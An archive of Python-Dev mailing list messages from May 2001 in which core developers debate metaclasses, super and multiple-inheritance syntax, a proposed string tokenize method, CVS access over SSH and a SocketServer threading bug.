References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>  	            <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com> <028a01c0d3a8$9e05f190$e46940d5@hagrid>
Message-ID: <3AF11F65.5CBF508C@lemburg.com>

Fredrik Lundh wrote:
> 
> mal wrote:
> 
> > Here's some sample output (Netscape can unscramble this BTW):
> 
> heh.  just discovered that outlook express can deal with this
> too -- but only if the message comes from the usenet.
> 
> on ordinary mail, the "unscramble rot13" menu entry is disabled
> (too much usability testing?)
> 
> maybe you could repost your secret message to comp.lang.python ;-)

It wasn't all that secret: I simply cut&pasted the first
two paragraphs of the message through the codec.

There was also an inaccuracy in the posting: the codec still
produces Unicode (by virtue of using the charmap codec as
basis). 

Still, it serves as nice example of what str.decode()
and str.encode() can be used for and also demonstrates how
easy it is to install new codecs.

I think I'll repost it to c.l.p though -- with a new secret 
attached to it ;-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido@digicool.com  Thu May  3 15:26:22 2001
From: guido@digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 09:26:22 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Thu, 03 May 2001 09:49:37 +0200."
 <3AF10D91.802C8555@lemburg.com>
References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz>
 <3AF10D91.802C8555@lemburg.com>
Message-ID: <200105031426.JAA07372@cj20424-a.reston1.va.home.com>

> We are actually trying to turn classes into types here :-)

Yes!  Wait till you see my next batch of checkins. :-)

> Really, I think that we could resolve this issue by not inheriting
> from meta-classes. DictType is a creation of the meta-class
> TypeType. I'm not calling these instances to prevent additional
> confusion. The root of the problem is that for some reason there
> is belief that DictType should implicitly inherit attributes and 
> methods from TypeType. If we simply say that there is no implicit
> inheritance (only explicit one), then these problems should go
> away.

Sorry, you still seem to be confused about this.  As I tried to
explain before, DictType does not *inherit* from TypeType, but it is
an *instance* of TypeType.  TypeType defines a __repr__() method for
all its instances.  This is needed so that repr(DictType) returns
"<type 'DictType'>".  It is *not* inherited from TypeType!

If DictType were to inherit from something, it would inherit from the
(not yet existing) ObjectType.  ObjectType would have a __repr__
method too: it returns "<foo object at 0x......>".

But this method is overridden by DictType, so doesn't come into play.

Requiring explicit inheritance (whatever that may be) won't fix the
problem.

> Some of these ideas are burried in the "super" part of this 
> thread. Unfortunately this concept doesn't go very far since
> Python has multiple inheritance and thus the term "super"
> (referring to the class' single base class) is not well-defined.

Not true.  While super can't always refer to a single class, the use
of super can be completely well-defined in an unambiguous way.  Given

  class D(A, B, C):
    def foo(self):
      super.foo(self)

"super.foo" is whatever would be called in D1 if we changed the class
hierarchy as follows:

  class D1(A, B, C): pass
  class D(D1):
    def foo(self):
      D1.foo(self)

The problem with super is not that it isn't well-defined.  Its problem
is that it's not enough to do what you want.  In some situations
involving multiple inheritance, it can be essential to be able to
"merge" methods of the sane name defined in each of the base classes,
e.g.

  class C(A, B):
    def save(self):
      A.save(self)
      B.save(self)

So we can't use super as an argument to abandon explicitly naming the
base class of base methods.  Out of the proposed spellings that I can
remember:

      B.save(self)			# current Python
      B.__dict__['save'](self)		# ditto, butt ugly
      B::save(self)			# C++
      B._.save(self)			# Don Beaudry
      B.instanceMethods.save(self)	# ???

I still like current Python best!

> As Jim mentioned in his reply to Thomas' question, SmallTalk
> has two parallel hierarchies. One for the classes and one for
> the meta-classes. If we follow the same path in Python and
> keep the two well separated, I think we can resolve many of
> the issues which are currently showing up.

Yeah, but this is not the path that Python has already taken (and
which has been beaten further by Jim Fulton's ExtensionClasses).
Python's path is "turtles all the way down".  See also my old
head-exploding metaclasses paper.

> To link the two hierarchies together we don't need a "super"
> concept, but instead a way to reach the meta-class in charge
> of a class, say "klass.__creator__". 

Your confusion between the "isInstanceOf" and "isInheritedFrom"
relationships seems really deep!  Super relates to inheritance.
Metaclasses relate to instantiation (of the class, as an instance of
the metaclass).

> Note that there's another issue hiding in all this and again
> this is due to multiple inheritance: which meta-class is in
> charge of a class which is derived from two classes having
> different meta-classes ?
> 
> meta1            -->         o klass1
>                                o klass1a
>                                o klass1b
> meta2            -->         o klass2
>                                o klass2a
>                                o klass2b
> 
> class klass3(klass1a, klass2b):
>       ...                  
> 
> I think there's no clean way to resolve this, so I'd suggest
> to simply rule this out and declare it illegal (class can
> only be based on classes having the same meta-class).

Unfortunately, again thanks to Jim Fulton, we can't rule this out,
because this is actually used by ExtensionClasses.  The rule (as I
interpret it) gives the first base class control; if the first base
class is a standard class, it looks if any of the other base classes
are not standard classes, and if so, gives control to the first such
base class.  Another way to say this is that the first base class that
has a non-standard metaclass gets control.

(ExtensionClasses implements an additional rule where it requires all
except one of the base classes to define no instance variables.  This
is an example of the importance of metaclasses done right: the
metaclass has control over such issues.  I don't think that
Smalltalk's metaclasses have this much control -- you pretty much have
a 1-1 correspondence between class and metaclass.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Thu May  3 15:28:03 2001
From: guido@digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 09:28:03 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Thu, 03 May 2001 15:27:34 +1200."
 <200105030327.PAA16472@s454.cosc.canterbury.ac.nz>
References: <200105030327.PAA16472@s454.cosc.canterbury.ac.nz>
Message-ID: <200105031428.JAA07405@cj20424-a.reston1.va.home.com>

> Guido:
> 
> > Actually, I think that what's in the __dict__ is just perfect
> 
> I was thinking of backwards compatibility for people who
> are hacking the __dict__ of a class directly.

Depending on how they hack it, it may still work.

> If you don't care about that, the problem is simpler.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com (Skip Montanaro)  Thu May  3 15:26:51 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Thu, 3 May 2001 09:26:51 -0500
Subject: [Python-Dev] OT: CVS access through firewall via SSH
Message-ID: <15089.27307.136251.862692@beluga.mojam.com>

Python-dev folks,

Sorry for the off-topic post, but I'm striking out on the various other
sources I've located so far.  Since this group seemed to have a love-hate
relationship with CVS for awhile I thought maybe someone here would be able
to steer me in the right direction.

I have to access a CVS repository through a firewall via SSH.  That is, to
get to "server" I have to tunnel through "firewall" using SSH to port "nnn".
Using SSH to establish an interactive session to server is no problem:

    ssh -p nnn firewall

When I'm inside the firewall, I use a CVSROOT that looks like

    :pserver:montanaro@server:/cvs/projects

I need to merge the two bits somehow to come up with a CVSROOT that will do
the tunnel automagically.  I've tried this:

    :pserver:montanaro@firewall:nnn/cvs/projects

but CVS complains

    cvs [update aborted]: connect to firewall:2401 failed: Connection refused

(port 2401 is the normal CVS port).

Any suggestions or pointers?

Thanks,

Skip


From mal@lemburg.com  Thu May  3 17:08:30 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 03 May 2001 18:08:30 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz>
 <3AF10D91.802C8555@lemburg.com> <200105031426.JAA07372@cj20424-a.reston1.va.home.com>
Message-ID: <3AF1827E.E730F5DE@lemburg.com>

Guido van Rossum wrote:
> 
> > We are actually trying to turn classes into types here :-)
> 
> Yes!  Wait till you see my next batch of checkins. :-)

Looking forward to them :) 

BTW, can you give a good starting point into all this (code wise
and concept wise) ? I'd like to play around these new concepts
a litte to get a beeter feeling for the possible issues (I should
have done the same for the coercion stuff a year ago: implementing
mxNumber I now find that some important hooks are missing :-().
 
> > Really, I think that we could resolve this issue by not inheriting
> > from meta-classes. DictType is a creation of the meta-class
> > TypeType. I'm not calling these instances to prevent additional
> > confusion. The root of the problem is that for some reason there
> > is belief that DictType should implicitly inherit attributes and
> > methods from TypeType. If we simply say that there is no implicit
> > inheritance (only explicit one), then these problems should go
> > away.
> 
> Sorry, you still seem to be confused about this. 

I think it has to do with terminology: when I say "inherit"
I actually mean "the lookup is forwarded to the another object".

In that sense, instances inherit from their classes and 
classes from their base-classes:

meta-class M ->        o base-class A
                         o class B
                           o instance x = B()  

Meta-class M control this "inheritance scheme" and can modify
it depending on its needs. 

Here's a scenario of what I have in mind:

In the above picture, say A defines an attribute A.a which is not 
defined in B or as instance attribute of B(). Querying x.a would then 
launch this process:

1. x.a -> fails
2. M.__findattr__(x, 'a') is called to find and return the
   attribute
3. M.__findattr__ asks B for an attribute 'a' -> fails
4.    -- " --     asks A       -- " --        -> success
5.    -- " --     returns the found attribute

I know that this is somewhat different under the covers than
what's happening now, but the Python programmer will not notice
this. It most probably does not work well with the Don Beaudry
hook though... so maybe I'm simply on the wrong track here.

> As I tried to
> explain before, DictType does not *inherit* from TypeType, but it is
> an *instance* of TypeType.  TypeType defines a __repr__() method for
> all its instances.  This is needed so that repr(DictType) returns
> "<type 'DictType'>".  It is *not* inherited from TypeType!
> 
> If DictType were to inherit from something, it would inherit from the
> (not yet existing) ObjectType.  ObjectType would have a __repr__
> method too: it returns "<foo object at 0x......>".
> 
> But this method is overridden by DictType, so doesn't come into play.
> 
> Requiring explicit inheritance (whatever that may be) won't fix the
> problem.

With "explicit inheritance" I meant that the programmer has to
take care of passing the lookup on to the meta-class, rather
than applying some magic which hooks together class and meta-
class.
 
> > Some of these ideas are burried in the "super" part of this
> > thread. Unfortunately this concept doesn't go very far since
> > Python has multiple inheritance and thus the term "super"
> > (referring to the class' single base class) is not well-defined.
> 
> Not true.  While super can't always refer to a single class, the use
> of super can be completely well-defined in an unambiguous way.  Given
> 
>   class D(A, B, C):
>     def foo(self):
>       super.foo(self)
> 
> "super.foo" is whatever would be called in D1 if we changed the class
> hierarchy as follows:
> 
>   class D1(A, B, C): pass
>   class D(D1):
>     def foo(self):
>       D1.foo(self)

Nice trick -- much like the "+0" trick in math ;-)

> The problem with super is not that it isn't well-defined.  Its problem
> is that it's not enough to do what you want.  In some situations
> involving multiple inheritance, it can be essential to be able to
> "merge" methods of the sane name defined in each of the base classes,
> e.g.
> 
>   class C(A, B):
>     def save(self):
>       A.save(self)
>       B.save(self)
> 
> So we can't use super as an argument to abandon explicitly naming the
> base class of base methods.  Out of the proposed spellings that I can
> remember:
> 
>       B.save(self)                      # current Python
>       B.__dict__['save'](self)          # ditto, butt ugly
>       B::save(self)                     # C++
>       B._.save(self)                    # Don Beaudry
>       B.instanceMethods.save(self)      # ???
> 
> I still like current Python best!

But it doesn't help us in the very common case of mixin classes
since there the method and sometimes even not the programmer
will know where the basemethod to call lives. This is why I
wrote the basemethod() helper: it looks up the right method
at run-time and thus allows writing mixin-classes which override
methods of other classes which are only known to the programmer
using the mixin and not necessarily to the one writing the mixin.
 
> > As Jim mentioned in his reply to Thomas' question, SmallTalk
> > has two parallel hierarchies. One for the classes and one for
> > the meta-classes. If we follow the same path in Python and
> > keep the two well separated, I think we can resolve many of
> > the issues which are currently showing up.
> 
> Yeah, but this is not the path that Python has already taken (and
> which has been beaten further by Jim Fulton's ExtensionClasses).
> Python's path is "turtles all the way down".  See also my old
> head-exploding metaclasses paper.

I know... I was under the impression, though, that a little
breakage under the covers is allowed when moving from type/classes
to all types.
 
> > To link the two hierarchies together we don't need a "super"
> > concept, but instead a way to reach the meta-class in charge
> > of a class, say "klass.__creator__".
> 
> Your confusion between the "isInstanceOf" and "isInheritedFrom"
> relationships seems really deep!  Super relates to inheritance.
> Metaclasses relate to instantiation (of the class, as an instance of
> the metaclass).

See above... I don't like implicitely binding creation of objects
with lookup paths. These two concepts don't belong together, IMHO,
since they introduce restrictions which are not really necessary.
(I have made some great experience with loosly coupled object
systems and don't want to miss their flexibility anymore.)

> > Note that there's another issue hiding in all this and again
> > this is due to multiple inheritance: which meta-class is in
> > charge of a class which is derived from two classes having
> > different meta-classes ?
> >
> > meta1            -->         o klass1
> >                                o klass1a
> >                                o klass1b
> > meta2            -->         o klass2
> >                                o klass2a
> >                                o klass2b
> >
> > class klass3(klass1a, klass2b):
> >       ...
> >
> > I think there's no clean way to resolve this, so I'd suggest
> > to simply rule this out and declare it illegal (class can
> > only be based on classes having the same meta-class).
> 
> Unfortunately, again thanks to Jim Fulton, we can't rule this out,
> because this is actually used by ExtensionClasses.  The rule (as I
> interpret it) gives the first base class control; if the first base
> class is a standard class, it looks if any of the other base classes
> are not standard classes, and if so, gives control to the first such
> base class.  Another way to say this is that the first base class that
> has a non-standard metaclass gets control.

Ouch. Still, since Jim's in control of ExtensionClass -- wouldn't
it be possible to adapt ExtensionClass to an altered scheme ?

> (ExtensionClasses implements an additional rule where it requires all
> except one of the base classes to define no instance variables.  This
> is an example of the importance of metaclasses done right: the
> metaclass has control over such issues.  I don't think that
> Smalltalk's metaclasses have this much control -- you pretty much have
> a 1-1 correspondence between class and metaclass.

Right: more power to the meta-class :-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From paul@pfdubois.com  Thu May  3 17:24:40 2001
From: paul@pfdubois.com (Paul F. Dubois)
Date: Thu, 3 May 2001 09:24:40 -0700
Subject: [Python-Dev] Multiple inheritance
Message-ID: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>

Pardon if this is brief and suggestive only, I am on deadlines.

Super is a mistaken concept in multiple inheritance languages. Fortunately,
Python is not brain-damaged. Its multiple inheritance model can be fixed
easily to be fully capable.

Here is a suggestive example of implementing the Eiffel model (the only one
that is theoretically sound) using "pretend" Python syntax (keyword
conservationists might like "import" where I have "rename"):


1. The simple case, X inherits from Y and in defining foo and bar needs to
use Y's version:

class X (Y rename foo as _sfoo,
                  bar as _sbar
        ):
    def foo (self):
        self._sfoo()
        myfoostuff

Suppose D inherits from B and C, which both inherit from A.
A has a method a1 that is redefined in B but not in C.
D wishes to use both A's version as inherited via C and B's version.

class D (B rename a1 as ba1, C rename a1 as ca1):

     can now use self.ca1, self.a1

Renaming is also useful where you inherit from a utility class and the lingo
is different in the class where you want to use it. E.g. class Window (Tree
rename children as subWindows)

Reference: Meyer, B. "Object-Oriented Software Construction", 2nd Edition.


From Donald Beaudry <donb@abinitio.com>  Thu May  3 17:47:29 2001
From: Donald Beaudry <donb@abinitio.com> (Donald Beaudry)
Date: Thu, 03 May 2001 12:47:29 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <LNBBLJKPBEHFEDALKOLCMEPNJPAA.tim.one@home.com>
Message-ID: <200105031647.MAA25803@localhost.localdomain>

"Tim Peters" <tim.one@home.com> wrote,
> Given that we're using Python's search rules, the ambiguous point remaining
> is whether:
> 
>     super.f()
> 
> textually contained in a method of class K begins searching with:
> 
>     1) K.__bases__
> 
> or with:
> 
>     2) self.__class__.__bases__

It can only be 1.  The using 2 will only be correct if you are in a
method defined on a leaf class.  If not in a leaf, the search will
find the method you are already in... recursion is likely to terminate
in a stack overflow ;)

--
Donald Beaudry                                     Ab Initio Software Corp.
                                                   201 Spring Street
donb@init.com                                      Lexington, MA 02421
                  ...So much code, so little time...


From guido@digicool.com  Thu May  3 19:48:19 2001
From: guido@digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 14:48:19 -0400
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: Your message of "Thu, 03 May 2001 09:24:40 PDT."
 <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
Message-ID: <200105031848.f43ImKg14308@odiug.digicool.com>


From guido@digicool.com  Thu May  3 19:50:30 2001
From: guido@digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 14:50:30 -0400
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: Your message of "Thu, 03 May 2001 09:24:40 PDT."
 <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
Message-ID: <200105031850.f43IoVf14328@odiug.digicool.com>

> Pardon if this is brief and suggestive only, I am on deadlines.

No problem.  We appreciate it!

> Super is a mistaken concept in multiple inheritance languages. Fortunately,
> Python is not brain-damaged. Its multiple inheritance model can be fixed
> easily to be fully capable.
> 
> Here is a suggestive example of implementing the Eiffel model (the only one
> that is theoretically sound) using "pretend" Python syntax (keyword
> conservationists might like "import" where I have "rename"):
> 
> 
> 1. The simple case, X inherits from Y and in defining foo and bar needs to
> use Y's version:
> 
> class X (Y rename foo as _sfoo,
>                   bar as _sbar
>         ):
>     def foo (self):
>         self._sfoo()
>         myfoostuff

Nice!  This is similar to Jeremy's favorite way of spelling "super":

class X(Y):
    Yfoo = Y.foo
    def foo(self):
        self.Yfoo()
        myfoostuff

> Suppose D inherits from B and C, which both inherit from A.
> A has a method a1 that is redefined in B but not in C.
> D wishes to use both A's version as inherited via C and B's version.
> 
> class D (B rename a1 as ba1, C rename a1 as ca1):
> 
>      can now use self.ca1, self.a1
> 
> Renaming is also useful where you inherit from a utility class and the lingo
> is different in the class where you want to use it. E.g. class Window (Tree
> rename children as subWindows)
> 
> Reference: Meyer, B. "Object-Oriented Software Construction", 2nd Edition.

Yes.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jepler@inetnebr.com  Thu May  3 19:17:16 2001
From: jepler@inetnebr.com (Jeff Epler)
Date: Thu, 3 May 2001 13:17:16 -0500
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>; from paul@pfdubois.com on Thu, May 03, 2001 at 09:24:40AM -0700
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
Message-ID: <20010503131714.D21814@inetnebr.com>

On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote:
> class X (Y rename foo as _sfoo,
>                   bar as _sbar
>         ):

Why not let us spell this as:
	class X(Y):
		from Y import foo as _sfoo, bar as _sbar
		...

Of course, then you can spell inheritance as
	class X:
		from Y import *
Right?  :)

Jeff


From nas@python.ca  Thu May  3 20:05:37 2001
From: nas@python.ca (Neil Schemenauer)
Date: Thu, 3 May 2001 12:05:37 -0700
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <20010503131714.D21814@inetnebr.com>; from jepler@inetnebr.com on Thu, May 03, 2001 at 01:17:16PM -0500
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> <20010503131714.D21814@inetnebr.com>
Message-ID: <20010503120537.A13708@glacier.fnational.com>

Jeff Epler wrote:
> On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote:
> > class X (Y rename foo as _sfoo,
> >                   bar as _sbar
> >         ):
> 
> Why not let us spell this as:
> 	class X(Y):
> 		from Y import foo as _sfoo, bar as _sbar
> 		...

This already has a meaning in Python.  Paul's suggested syntax is
pretty neat, IMHO.

  Neil


From trentm@ActiveState.com  Thu May  3 20:39:27 2001
From: trentm@ActiveState.com (Trent Mick)
Date: Thu, 3 May 2001 12:39:27 -0700
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <20010503120537.A13708@glacier.fnational.com>; from nas@python.ca on Thu, May 03, 2001 at 12:05:37PM -0700
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> <20010503131714.D21814@inetnebr.com> <20010503120537.A13708@glacier.fnational.com>
Message-ID: <20010503123927.B30837@ActiveState.com>

On Thu, May 03, 2001 at 12:05:37PM -0700, Neil Schemenauer wrote:
> Jeff Epler wrote:
> > On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote:
> > > class X (Y rename foo as _sfoo,
> > >                   bar as _sbar
> > >         ):
> > 
> > Why not let us spell this as:
> > 	class X(Y):
> > 		from Y import foo as _sfoo, bar as _sbar
> > 		...
> 
> This already has a meaning in Python.  Paul's suggested syntax is
> pretty neat, IMHO.

Ditto but how to you separate the "rename" lists for multiple inheritance?

    class X (Y rename foo as _sfoo, bar as _sbar; Z):
        pass
                                                ^---- what to use here

How about:

    class X(Y, Z):
        from Y inherit foo as _yfoo, bar as _ybar
        from Z inherit foo as _zfoo, bar as _zbar


Hmmmmm. Don't know if I like that either. Just throwing out ideas.

Trent

-- 
Trent Mick
TrentM@ActiveState.com


From greg@cosc.canterbury.ac.nz  Fri May  4 05:25:08 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 04 May 2001 16:25:08 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <3AF1827E.E730F5DE@lemburg.com>
Message-ID: <200105040425.QAA16645@s454.cosc.canterbury.ac.nz>

"M.-A. Lemburg" <mal@lemburg.com>:

> I think it has to do with terminology: when I say "inherit"
> I actually mean "the lookup is forwarded to the another object".

Some OO languages munge together the instance and inheritance
relationships, but Python isn't one of them. Using terminology
that way in the context of Python is guaranteed to cause
massive confusion!

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Fri May  4 05:58:20 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 04 May 2001 16:58:20 +1200 (NZST)
Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk)
In-Reply-To: <m14vCbn-000D2zC@artcom0.artcom-gmbh.de>
Message-ID: <200105040458.QAA16653@s454.cosc.canterbury.ac.nz>

pf@artcom-gmbh.de (Peter Funk):

> * People will confuse this with calling
> MyBaseClass.__getitem__(....)

Given type/class/instance unification, that's exactly how it'll
be implemented. So it's not confusion, it's insightful understanding!

> This '::' operator is not at all that ugly

Well, that's a matter of opinion. But I'll concede that it's
less ugly than something like @ or $.

But in any case, it's not going to mean quite the same thing
in Python as it does in C++, so it might just confuse C++
people.

What exactly *is* it going to mean in Python, anyway?
Will it have a corresponding __magic__ method, and if so,
what will it be called?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From mal@lemburg.com  Fri May  4 09:40:17 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 04 May 2001 10:40:17 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105040425.QAA16645@s454.cosc.canterbury.ac.nz>
Message-ID: <3AF26AF1.780462E2@lemburg.com>

Greg Ewing wrote:
> 
> "M.-A. Lemburg" <mal@lemburg.com>:
> 
> > I think it has to do with terminology: when I say "inherit"
> > I actually mean "the lookup is forwarded to the another object".
> 
> Some OO languages munge together the instance and inheritance
> relationships, but Python isn't one of them. Using terminology
> that way in the context of Python is guaranteed to cause
> massive confusion!

But that's exactly what I am trying to do here: separate the
notion of how lookups work (inheritance) from how objects are 
created (instantiation) !

In Python instantiation binds the new object to the creating
class and all failing lookups are directed from the object to
the class. 

OTOH, the class - base-class lookup relationship 
doesn't have anything to do creation of objects -- classes
are simply bound to their base-classes per definition of the
class in the sense that failing lookups are directed to the
base-classes.

Classes themselves are created by meta-classes. The lookup
strategy between the two is defined by the meta-class.

What I'm argueing for is that meta-classes should get complete
control over how lookups and object creation are done. However,
this will only be possible by breaking the current automatic
lookup scheme at the meta-class - class boundary since otherwise
you'd run into endless loops during lookups (e.g. for many of
the __xxx__ methods).

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Fri May  4 10:04:08 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 04 May 2001 11:04:08 +0200
Subject: [Python-Dev] "".tokenize() ?
Message-ID: <3AF27088.DE495210@lemburg.com>

Gustavo Niemeyer submitted a patch which adds a tokenize like
method to strings and Unicode:

"one, two and three".tokenize([",", "and"])
-> ["one", " two ", "three"]

I like this method -- should I review the code and then check it in ?

PS: Haven't gotten any response regarding the .decode() method yet...
should I take this as "no objections" ?

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik@pythonware.com  Fri May  4 10:57:19 2001
From: fredrik@pythonware.com (Fredrik Lundh)
Date: Fri, 4 May 2001 11:57:19 +0200
Subject: [Python-Dev] "".tokenize() ?
References: <3AF27088.DE495210@lemburg.com>
Message-ID: <017301c0d480$9d445f20$0900a8c0@spiff>

mal wrote:


> Gustavo Niemeyer submitted a patch which adds a tokenize like
> method to strings and Unicode:
>
> "one, two and three".tokenize([",", "and"])
> -> ["one", " two ", "three"]
>
> I like this method -- should I review the code and then check it in ?

-1.  method bloat.  not exactly something you do every day, and
when you do, it's a one-liner:

def tokenize(string, ignore):
    [word for word in re.findall("\w+", string) if not word in ignore]

> PS: Haven't gotten any response regarding the .decode() method yet...
> should I take this as "no objections" ?

-0.  method bloat.  we don't have asfloat methods on integers and
asint methods on strings either...

Cheers /F


From mal@lemburg.com  Fri May  4 11:16:16 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 04 May 2001 12:16:16 +0200
Subject: [Python-Dev] "".tokenize() ?
References: <3AF27088.DE495210@lemburg.com> <017301c0d480$9d445f20$0900a8c0@spiff>
Message-ID: <3AF28170.399C2A5@lemburg.com>

Fredrik Lundh wrote:
> 
> mal wrote:
> 
> > Gustavo Niemeyer submitted a patch which adds a tokenize like
> > method to strings and Unicode:
> >
> > "one, two and three".tokenize([",", "and"])
> > -> ["one", " two ", "three"]
> >
> > I like this method -- should I review the code and then check it in ?
> 
> -1.  method bloat.  not exactly something you do every day, and
> when you do, it's a one-liner:
> 
> def tokenize(string, ignore):
>     [word for word in re.findall("\w+", string) if not word in ignore]

This is not the same as what .tokenize() does: it cut at each
occurrance of a substring rather than words as in your example
(although I must say that list comprehension looks cool ;-).
 
> > PS: Haven't gotten any response regarding the .decode() method yet...
> > should I take this as "no objections" ?
> 
> -0.  method bloat.  we don't have asfloat methods on integers and
> asint methods on strings either...

Well, we already have .encode() which interfaces to PyString_Encode(),
but no Python API for getting at PyString_Decode(). This is what
.decode() is for. Depending on the codecs you use, these two
methods can be very useful, e.g. for "fixing" line-endings or
hexifying strings. The codec concept can be used for far more
applications than just converting from and to Unicode.

About rich method APIs in general: I like having rich method APIs,
since they make life easier (you don't have to reinvent the wheel 
everytime you want a common job to be done). IMHO, too many
methods can never hurt, but I'm probably alone with that POV.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik@pythonware.com  Fri May  4 11:50:06 2001
From: fredrik@pythonware.com (Fredrik Lundh)
Date: Fri, 4 May 2001 12:50:06 +0200
Subject: [Python-Dev] "".tokenize() ?
References: <3AF27088.DE495210@lemburg.com> <017301c0d480$9d445f20$0900a8c0@spiff> <3AF28170.399C2A5@lemburg.com>
Message-ID: <01c801c0d487$fb94f290$0900a8c0@spiff>

mal wrote:

> > > "one, two and three".tokenize([",", "and"])
> > > -> ["one", " two ", "three"]
> > >
> > > I like this method -- should I review the code and then check it in ?
> >
> > -1.  method bloat.  not exactly something you do every day, and
> > when you do, it's a one-liner:
> >
> > def tokenize(string, ignore):
> >     [word for word in re.findall("\w+", string) if not word in ignore]
>
> This is not the same as what .tokenize() does: it cut at each
> occurrance of a substring rather than words as in your example

oh, I didn't see the spaces.  splitting on all substrings is even
easier (but perhaps a bit more obscure, at least when written
on one line):

def tokenize(string, seps):
    return re.split("|".join(map(re.escape, seps)), string)

Cheers /F


From lkcl@samba-tng.org  Fri May  4 12:31:29 2001
From: lkcl@samba-tng.org (Luke Kenneth Casson Leighton)
Date: Fri, 4 May 2001 13:31:29 +0200
Subject: [Python-Dev] [noreply@sourceforge.net: [ python-Bugs-417845 ] Python 2.1: SocketServer.ThreadingMixIn]
Message-ID: <20010504133129.K26116@angua.rince.de>

hi there,

i thought it best to bring this to someone's attention.

the forkingmixin code keeps track of its children, plus
because it forks, there's no close_requests() to interfere
with the operation of the child etc. etc.

now, for some marginally bizarre reason, adding an
extra base class - BaseServer - has, i believe (without
proof, just a hunch), caused a bug in ThreadingMixIn to be
more likely to occur.

now, i wrote BaseServer in order to be able to overload
this for a server that reads from a SQL server table
and performs actions based on what it reads from there
(the name of a host and the name of a python script to
action on the host, from the database :) :)

... but i don't do threading.  python is my first
actual exposure to thread programming.  does anyone
have enough experience with threads to write something
in less lines and less time than this message?

all best,

luke

----- Forwarded message from noreply@sourceforge.net -----

Delivered-To: lkcl@angua.rince.de
Delivered-To: lkcl@samba.org
To: noreply@sourceforge.net
From: noreply@sourceforge.net
Subject: [ python-Bugs-417845 ] Python 2.1: SocketServer.ThreadingMixIn
Date: Thu, 03 May 2001 16:26:12 -0700

Bugs item #417845, was updated on 2001-04-21 08:28
You can respond by visiting: 
http://sourceforge.net/tracker/?func=detail&atid=105470&aid=417845&group_id=5470

Category: Python Library
Group: None
Status: Open
Resolution: None
Priority: 5
Submitted By: Nobody/Anonymous (nobody)
Assigned to: Guido van Rossum (gvanrossum)
Summary: Python 2.1: SocketServer.ThreadingMixIn

Initial Comment:
SocketServer.ThreadingMixIn does not work properly
since it tries to close the socket of a request two
times.


From gward@python.net  Fri May  4 19:12:44 2001
From: gward@python.net (Greg Ward)
Date: Fri, 4 May 2001 14:12:44 -0400
